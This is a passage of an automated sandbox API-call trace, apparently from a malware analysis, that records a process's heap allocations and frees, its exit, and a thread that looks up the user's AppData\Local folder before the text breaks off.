lpMem=0x328de10 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b0000 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32807e8 | out: hHeap=0x660000) returned 1 [0061.466] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3281830 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32450a0 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3ff0 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257630 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298770 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298728 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298da0 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298d58 | out: hHeap=0x660000) returned 1 [0061.467] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257048 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257390 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3247810 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b39b8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f358 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x680b30 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32125d8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c216d8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c21f60 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c227e8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c23070 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b248 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c205c8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b08d8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c28c58 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c300c0 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c32220 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b49e0 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b41c8 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b39b0 | out: hHeap=0x660000) returned 1 [0061.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c4c30 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b7268 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b82c8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b8b00 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b9338 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b9b70 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32babe8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ba3a8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b7a90 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bbc78 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bd568 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32be1e8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bb430 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bc4c0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bee68 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bf6b0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c10048 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c10880 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c110b8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c118f0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c12118 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c12940 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c13168 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c139a0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c141d8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c14a18 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c25258 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c25ed8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c152a0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c15b28 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32bcce8 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c26b58 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c273a0 | out: hHeap=0x660000) returned 1 [0061.469] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c24a00 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c27be8 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c28420 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c163b0 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c16c38 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c17d48 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c29488 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2a4f8 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c185d0 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2bdd8 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2ca58 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c18e58 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c196e0 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2d6d8 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2b570 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2e758 | out: hHeap=0x660000) returned 1 [0061.470] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c29cc0 | out: hHeap=0x660000) returned 1 [0061.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2ad30 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2df10 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c174c0 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1a7f0 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1b078 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c19f68 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1c188 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1ca10 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c30920 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c315a0 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1d298 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1db20 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1e3a8 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2f878 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1ec30 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1f4b8 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1fd40 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c1b900 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c20e50 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c2efa0 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3281e58 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x742308 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282ed0 | out: hHeap=0x660000) returned 1 [0061.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3281008 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231e68 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231570 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32829b0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5afb0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5b838 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5c0c0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5c948 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b318 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c539d0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c596e0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c59ef8 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c54258 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c54ae0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c55368 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c55bf0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5a728 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228878 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c32a50 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c332d8 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c33b60 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c343e8 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c34c70 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b2170 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c354f8 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c35d80 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b29b8 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c42a38 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c432a0 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c36608 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c36e90 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c43b08 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c44350 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c37718 | out: hHeap=0x660000) returned 1 [0061.474] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c37fa0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c38828 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c390b0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c39938 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3a1c0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3aa48 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3b2d0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3bb58 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3c3e0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c44b98 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c45400 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3cc68 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3d4f0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3dd78 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c45c68 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c464b0 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3e600 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3ee88 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3f710 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c3ff98 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c40820 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c410a8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c41930 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c46d10 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c47598 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c56cf8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c57560 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c47e20 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c486a8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c48f30 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c57dc8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c497b8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4a040 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4a8c8 | out: hHeap=0x660000) returned 1 [0061.475] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4b150 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4b9d8 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4c260 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4cae8 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4d370 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4dbf8 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4e480 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c58610 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c58e78 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4ed08 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4f590 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c4fe18 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c506a0 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c50f28 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c517b0 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c52038 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c528c0 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c53148 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b6b20 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b6308 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b2b0 | out: hHeap=0x660000) returned 1 [0061.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b10f8 | out: hHeap=0x660000) returned 1 [0061.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c238f8 | out: hHeap=0x660000) returned 1 [0061.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b5af0 | out: hHeap=0x660000) returned 1 [0061.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32b51f8 | out: hHeap=0x660000) returned 1 [0061.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x684088 | out: hHeap=0x660000) returned 1 [0061.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x660000) returned 1 [0061.478] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18ed0c | out: phModule=0x18ed0c) returned 0 [0061.478] ExitProcess (uExitCode=0x0) [0061.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x324e4d8 | out: hHeap=0x660000) returned 1 [0061.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x681688 | out: hHeap=0x660000) returned 1 [0061.483] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 33 os_tid = 0x944 Thread: id = 34 os_tid = 0x948 Thread: id = 35 os_tid = 0x94c Thread: id = 36 os_tid = 0x950 Thread: id = 37 os_tid = 0x954 Thread: id = 38 os_tid = 0x958 Thread: id = 39 os_tid = 0x95c Thread: id = 40 os_tid = 0x960 Thread: id = 41 os_tid = 0x964 Thread: id = 44 os_tid = 0x9d8 [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x3234418 [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x3201228 [0040.839] GetLastError () returned 0x54f [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x3bc) returned 0x322d068 [0040.839] GetCurrentThreadId () returned 0x9d8 [0040.839] SetLastError (dwErrCode=0x54f) [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3240b28 [0040.839] GetLastError () returned 0x54f [0040.839] SetLastError (dwErrCode=0x54f) [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0040.839] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0040.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240b28 | out: hHeap=0x660000) returned 1 [0040.839] GetLastError () returned 0x54f [0040.840] SetLastError (dwErrCode=0x54f) [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x48) returned 0x32402a0 [0040.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0040.840] GetLastError () returned 0x54f [0040.840] SetLastError (dwErrCode=0x54f) [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x742098 [0040.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32402a0 | out: hHeap=0x660000) returned 1 [0040.840] GetLastError () returned 0x54f [0040.840] SetLastError (dwErrCode=0x54f) [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257198 [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x6b47f8 [0040.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x742098 | out: hHeap=0x660000) returned 1 [0040.840] GetLastError () returned 0x54f [0040.840] SetLastError (dwErrCode=0x54f) [0040.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257048 [0040.840] GetLastError () returned 0x54f [0040.840] SetLastError (dwErrCode=0x54f) [0040.840] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0040.840] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0040.840] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathA") returned 0x760e7804 [0040.841] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x400) returned 0x322d430 [0040.841] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x322d430 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0040.841] UuidCreate (in: 